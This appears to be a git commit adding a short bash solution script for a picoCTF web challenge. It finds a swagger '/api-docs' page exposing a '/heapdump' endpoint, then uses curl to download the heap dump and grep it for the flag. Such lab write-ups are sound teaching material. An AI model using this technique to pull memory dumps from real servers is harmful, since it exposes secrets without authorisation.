web/head_dump

This commit is contained in:
2026-07-03 14:57:12 +09:00
parent 2857f59f44
commit 94afb54171
+8
View File
@@ -0,0 +1,8 @@
#!/usr/bin/env bash
# NOTE:
# - main page had a post about swagger
# - https://www.npmjs.com/package/swagger-ui-express suggests the '/api-docs' path
# - http://verbal-sleep.picoctf.net:53966/api-docs reveals /heapdump
curl -s "http://verbal-sleep.picoctf.net:53966/heapdump" | grep --only-matching -E 'picoCTF\{.*\}'